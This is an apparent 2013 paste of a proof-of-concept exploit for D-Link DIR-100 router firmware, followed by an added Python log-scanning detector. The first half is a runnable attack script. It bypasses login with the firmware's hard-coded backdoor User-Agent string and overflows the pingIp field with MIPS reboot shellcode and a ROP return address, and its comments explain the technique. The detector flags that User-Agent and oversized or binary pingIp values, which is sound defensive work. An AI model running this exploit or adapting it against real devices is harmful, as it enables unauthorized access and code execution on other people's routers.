D-Link Backdoor Stack Overflow PoC DIR-100 v1.13

a guest
Oct 14th, 2013
#!/usr/bin/env python
###################################################################################################################
# PoC exploit code for DIR-100 revA, v1.13
# ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip
# Tested in an emulator, but should work on the real thing.
#
# A sprintf stack overflow exists in the RuntimeDiagnosticPing function inside /bin/webs. This is also
# theoretically susceptible to command injection, but there are few useful commands that can be executed (
# not even 'reboot'). Further, data is not URL decoded prior to the sprintf, spaces cannot be used in the GET
# request URL, and the $IFS environment variable does not seem to be set in the limited /bin/sh shell; thus,
# it would be difficult, if possible at all, to inject commands that take arguments.
#
# This is a simple ROP into the stack. After the sprintf, popen("ping -c 1 %s", "r") is called three times,
# which should be more than enough to ensure that the data cache has been flushed back to main memory (thus
# no need to ROP to a blocking call, such as sleep). Further, at return the $s5 register conveniently has a
# pointer to the user-supplied data on the stack, so we just return to offset 0x3243C in libc which puts
# the contents of $s5 into $t9 and then jumps to the address in $t9:
#
#   .text:0003243C                 move    $t9, $s5
#   .text:00032440                 jalr    $t9
#   .text:00032444                 nop
#
# Some known bad bytes that will cause the exploit to fail if they are contained in your request (there is no URL
# decoding!): '/', '?', '&', '=', '\r', '\n'
#
# Craig Heffner
# Tactical Network Solutions
###################################################################################################################

# Python 2 script: urllib2 and the print statement are used throughout.
import sys
import urllib2

try:
    url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
    print str(e)
    print 'Usage: %s <target ip>' % sys.argv[0]
    sys.exit(1)

# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li      v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404

# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102 (delay-slot filler, no effect)

# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
    shellcode_p1 += "D" * (86 - len(shellcode_p1))
    shellcode_p2 = ""
else:
    shellcode_p2 = "DD" + payload[68:]

# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2

# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
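Two things in the PoC above are directly observable on the wire and make good detection signals: the hard-coded backdoor User-Agent that bypasses authentication, and a pingIp parameter on /Tools/tools_misc.xgi that is far longer than any hostname and carries raw, non-URL-encoded bytes. The following Python 3 script is an added example (not part of the paste and not Craig Heffner's code) that flags both over HTTP request records. It assumes a combined-log-format line with the User-Agent as the last quoted field, as an IDS, proxy or reverse proxy in front of the router would write, and that raw bytes are logged as `\xhh` escapes; the 64-byte length threshold and the sample log lines are constructed for the example.

```python
#!/usr/bin/env python3
"""Detect DIR-100 backdoor User-Agent use and oversized/binary pingIp values in HTTP logs."""
import re

# Backdoor User-Agent from the PoC (it is "editby04882joelbackdoor_telmx" reversed).
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"
PING_ENDPOINT = "/Tools/tools_misc.xgi"
PING_PARAM = "pingIp="
# Assumed threshold: a legitimate ping target is an IPv4 literal or short hostname.
MAX_PING_VALUE_LEN = 64

# Assumed log layout: combined log format, User-Agent is the final quoted field.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Raw bytes escaped by the logger as \xhh (each escape stands for one byte on the wire).
ESCAPED_BYTE_RE = re.compile(r'\\x[0-9a-fA-F]{2}')


def ping_value(url):
    """Return the raw pingIp value from a tools_misc.xgi URL, or None if not present."""
    if not url.startswith(PING_ENDPOINT):
        return None
    idx = url.find(PING_PARAM)
    if idx < 0:
        return None
    return url[idx + len(PING_PARAM):]


def classify_request(url, user_agent):
    """Return the list of detection labels that apply to one request (empty if benign)."""
    findings = []
    if user_agent == BACKDOOR_UA:
        findings.append("backdoor-user-agent")
    value = ping_value(url)
    if value is not None:
        # Length in wire bytes: collapse each \xhh escape to a single placeholder byte.
        raw_len = len(ESCAPED_BYTE_RE.sub("B", value))
        if raw_len > MAX_PING_VALUE_LEN:
            findings.append("oversized-pingip")
        # The PoC sends machine code and a return address with no URL encoding,
        # so escaped bytes or non-printable characters never belong in a hostname.
        if ESCAPED_BYTE_RE.search(value) or any(not 0x20 <= ord(c) < 0x7f for c in value):
            findings.append("binary-pingip")
    return findings


def scan_log(lines):
    """Parse log lines and return one alert dict per request that triggers a finding."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        findings = classify_request(m.group("url"), m.group("ua"))
        if findings:
            alerts.append({"src": m.group("src"), "ts": m.group("ts"),
                           "url": m.group("url"), "findings": findings})
    return alerts


# Constructed sample traffic: a legitimate diagnostic ping, a backdoor-UA login bypass,
# and an overflow attempt using the PoC's first instruction bytes followed by padding.
SAMPLE_LOG = [
    '192.0.2.5 - - [14/Oct/2013:10:00:00 +0000] "GET /Tools/tools_misc.xgi?domain=a&set/runtime/'
    'diagnostic/pingIp=192.0.2.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Oct/2013:10:05:00 +0000] "GET /index.htm HTTP/1.1" 200 1024 "-" '
    '"' + BACKDOOR_UA + '"',
    '198.51.100.7 - - [14/Oct/2013:10:05:02 +0000] "GET /Tools/tools_misc.xgi?domain=a&set/runtime/'
    'diagnostic/pingIp=' + "\\x03\\xa0\\xf0\\x21" + "D" * 86 + ' HTTP/1.1" 200 0 "-" '
    '"' + BACKDOOR_UA + '"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("%s %s %s" % (alert["ts"], alert["src"], ",".join(alert["findings"])))
```

The User-Agent match is the high-confidence signal, since no legitimate client sends that string; the pingIp checks catch overflow attempts even when an attacker already holds admin credentials and does not need the backdoor.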